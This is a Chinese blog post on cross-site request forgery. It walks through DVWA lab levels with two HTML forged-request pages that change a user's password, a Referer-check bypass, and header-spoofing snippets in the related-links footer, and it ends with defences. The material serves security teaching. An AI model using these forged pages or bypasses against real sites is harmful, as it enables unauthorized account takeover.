CSRF

最新推荐文章于 2024-05-06 09:46:29 发布
最新推荐文章于 2024-05-06 09:46:29 发布
阅读量210 收藏
点赞数
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41667282/article/details/88134362
版权

CSRF全名是Cross Site Request Forgery,中文就是跨站请求伪造,重点在伪造上面,可以看成是黑客伪造了一个恶意页面,诱使用户访问,从而以该用户的身份在第三方站点执行一次操作。

上图是一个正常访问和异常访问的对比 ,下面的异常访问就是黑客的攻击过程。下面这个图是黑客通过CSRF以用户的账号进行转账的例子

攻击者伪造的请求要能被服务器验证通过,需要用户的浏览器能成功发送cookie。下面来先讲解一下cookie。

cookie分为两种,一种是“Session Cookie”,又称为”临时cookie“;另一种是“Third-party cookie”,也称为本地cookie。

区别是:Third-party cookie设置了expire时间,过了时间就失效;而session cookie是关闭浏览器失效。Third-party cookie保存在本地,而session cookie保存在浏览器进程的内存空间中。

如果浏览器从一个域的页面中,要加载另一个域的资源,某些浏览器(IE,safari)会阻止Third-party Cookie发送,这样需要cookie的CSRF攻击就有可能会失败。

但是P3P头的介入后情况变得复杂起来,有了P3P Header在某些情况将会允许浏览器发送第三方Cookie,包括IE浏览器,详细的P3P Header可以查阅W3C

下面进入实战环节,实战平台仍然是DVWA

这是一个界面,CSRF的目的就是要改变密码

一、low等级

先是抓包分析

点击查询参数

会发现提交时,提交了三个参数,在第一张图中需要注意请求方法是GET,这在表单提交的时候非常重要。

下面就是伪造恶意页面诱骗用户点击的过程了

恶意页面的构造有两种方法:

1、第一种是form表单

<!DOCTYPE html>
<html>
<head>
	<title></title>
</head>
<body>
	<form method="get" action="http://127.0.0.1/DVWA-master/vulnerabilities/csrf/">
		<input type="hidden" name="password_new" value="password"/>
		<input type="hidden" name="password_conf" value="password"/>
		<input type="hidden" name="Change" value="Change"/>
		<input type="submit"/>
	</form>
</body>
</html>

2、第二种就是利用<img>,<iframe>,<script>,<link>等这些带src属性的标签

<!DOCTYPE html>
<html>
<head>
	<title></title>
</head>
<body>
	<iframe src="http://127.0.0.1/DVWA-master/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change#"/>
</body>
</html>

二、medium等级

用前面的方法构造恶意页面进行访问,发现修改失败。

通过对比正常修改和异常修改的请求头可以发现,referer不一样,我们可以假设服务器对referer进行了限制,下面我们加以验证

点击编辑和重发,先将host后面的给去掉,然后重发,发现成功;然后去掉http重发,发现也成功。可以得到只要referer包含127.0.0.1就可以修改成功。

解决方法:只要在自己的服务器下新建一个名为127.0.0.1的文件夹,再将伪造的页面放入就可以成功绕过

请求头修改成这样,成功绕过

三、high等级

对应high等级发现前面两种方法都失效了

正常的修改过程,抓包分析,发现在提交的参数中多了一个user_token

user_token是随机的,要想获得user_token就必须结合XSS漏洞,如果网站不存在xss漏洞的话,user_token基本上是无法获得的。

这个例子说明对网站的攻击往往是多个漏洞相结合起来利用的

进行完实战演练,下面将讲解CSRF防御:

一、验证码

CSRF是在用户不知情的情况下完成的,设置验证码,强制用户与应用进行交互,从而遏制CSRF攻击

二、Referer Check

前面mediu等级,采用的就是这种方法,但是这种方法非常容易就可以绕过,除非设置非常严格的check。还有一个问题就是服务器并不是什么时候都能取到Referer的,有些用户会禁止Referer的发送,在某些情况下浏览器也不会发送Referer

三、Anti CSRF Token

CSRF的本质原因是重要操作的所有参数都是可以本攻击者猜测到

应对这种情况的一种简单做法是对参数加密,但这个方法有一些其他的副作用

Anti CSRF Token是一个更为普遍的做法,在high等级中用的防御方式就是这种。我们对URL新增一个token参数,token必须足够随机,采用真随机数生成器,而且必须做好保护,不能被第三方轻易的获得,不能将token放在url的search中,尽量放在form中,用POST提交。

 

jesus_H
关注
专栏目录
csrf绕过Referer技巧-01
09-15
CSRF绕过Referer技巧详解 CSRF(Cross-Site Request Forgery,跨站请求伪造)是一种常见的Web攻击方式,攻击者可以通过构造恶意页面诱骗用户执行非法操作。为了防御CSRF攻击,Web开发者通常会使用Referer头来判断...
SSRF服务端请求伪造
The code way of kinnisoy
10-06 178
ez_ssrf
伪造ip的headers
东隅的博客
12-08 1301
Referer:127.0.0.1 x-remote-IP: 127.0.0.1 x-forwarded-for: 127.0.0.1 x-remote-IP: 127.0.0.1 x-remote-ip: 127.0.0.1 x-client-ip: 127.0.0.1 x-client-IP: 127.0.0.1 X-Real-IP: 127.0.0.1 client-IP:127.0.0.1 x-originating-IP:127.0.0.1 x-remote-addr:127.0.0.1 X-Fo
XFF漏洞和referer的含义
zx980414k的博客
03-11 3210
XFF即x-forward-for,后面跟发起http请求的原始ip地址,如果是本机就是127.0.0.1 referer可以理解为从哪来,比如我用百度搜索CSDN,然后点击链接进入之后,在页面上按f12查看请求头会发现referer就是百度的域名。 XFF和referer可以用burp截断以后伪造,这就是XFF漏洞。 ...
Burpsuite插件 -- 伪造IP
weixin_41489908的博客
08-04 5679
太阳不是突然落山的,我希望你们永远听不懂这句话。。。 ---- 网易云热评 今天给大家介绍一款Burpsuite插件,burpFakeIP 一、下载地址 https://github.com/TheKingOfDuck/burpFakeIP 二、安装插件 1、解压到本地 2、打开burpsuite,选择Extender,Add 3、选择下载好python插件,选择下一步 4、安装成功 三、使用方法 1、伪造指定ip,右击抓到的数据包,选择fakeip,i...
有关http伪造绕过问题
最新发布
qq_46229939的博客
05-06 686
详细查阅
基于JSP的Java Web项目的CSRF防御示例
01-07
**基于JSP的Java Web项目的CSRF防御示例** 在Web开发中,跨站请求伪造(Cross-Site Request Forgery,简称CSRF)是一种常见且危险的安全漏洞,它允许攻击者在用户已登录的上下文中执行非预期的操作。在基于JSP的...
CSRF跨站请求伪造CSRF PHP demo代码
05-04
CSRF(Cross-Site Request Forgery,跨站请求伪造)是一种网络攻击方式,攻击者通过诱导用户在已登录的网站上执行非预期的操作。在这个PHP demo中,我们将深入理解CSRF攻击的原理,并探讨如何防范。 首先,让我们看...
详解利用spring-security解决CSRF问题
08-27
详解利用Spring Security解决CSRF问题 CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF。CSRF是一种常见的Web攻击方式,它可以在用户...
服务器端修改referer,CSRF绕过后端Referer校验
weixin_31640639的博客
08-12 1516
CSRF绕过后端Referer校验分正常情况和不正常的情况,我们这里主要讨论开发在写校验referer程序时,不正常的情况下怎么进行绕过。正常情况正常的情况指服务器端校验Referer的代码没毛病,那么意味着前端是无法绕过的。我之前考虑过的方案:JS修改Referer,失败;让用户点击第三方网站,但是浏览器就是使用第三方网站的referer,失败;不正常的情况不正常的情况指服务器端校验Refere...
HTTP Referer简介
08-05 426
在百度中搜索搜狐,点击链接进去,抓包信息如下: GET http://www.sohu.com/ HTTP/1.1 Host: www.sohu.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.4 (KHTML, like ...
HTTP请求头中的referer字段
热门推荐
老司机开代码的博客
08-03 1万+
文章目录1. HTTP_REFERER定义2. 实例3. referer字段的作用?1. 统计网站请求来源2. 防盗链4. referer为空的情况 1. HTTP_REFERER定义 HTTP Referer是header的一部分,当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。 简单来说就是当你向一个服务器发起请求的时候,服务器会很好奇,你是从哪里知道它的,因此你需要通过http请求头中的referer字段告
检测http中的REFERER信息,实现 防盗链
没有我的,只有你的
07-11 2713
文件1:1.html 李青松的账户信息 文件2: 2.php <?php if($_SERVER['HTTP_REFERER']){ if(strpos ($_SERVER['HTTP_REFERER'] , 'http://127.0.0.1/http/' )==0){ echo "李青松 2015/7/11 在学php编程.."; }else{ echo "非本网站来源,
【SpringBoot WebFlux 系列】 header 参数解析
小灰灰blog的专栏
09-11 1282
【SpringBoot WebFlux 系列】WebFlux 之 header 参数解析 上一篇 weblfux 主要介绍了 path 参数的解析与映射关系,在我们进入 url 参数/post 表单之前,先看一下另外的一种参数–请求头中的参数如何处理 I. 项目环境 本项目借助SpringBoot 2.2.1.RELEASE + maven 3.5.3 + IDEA进行开发 1. 依赖 使用 WebFlux,最主要的引入依赖如下(省略掉了 SpringBoot 的相关依赖,如对于如何创建 Sprin..
CSRF攻击与防御策略详解
跨站请求伪造(Cross-Site Request Forgery, CSRF)是一种常见的网络攻击手段,它利用受害者在已登录状态下对受信任网站的交互,未经授权执行恶意操作。攻击者通过在受害者的浏览器中植入脚本或者引导受害者点击含有...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值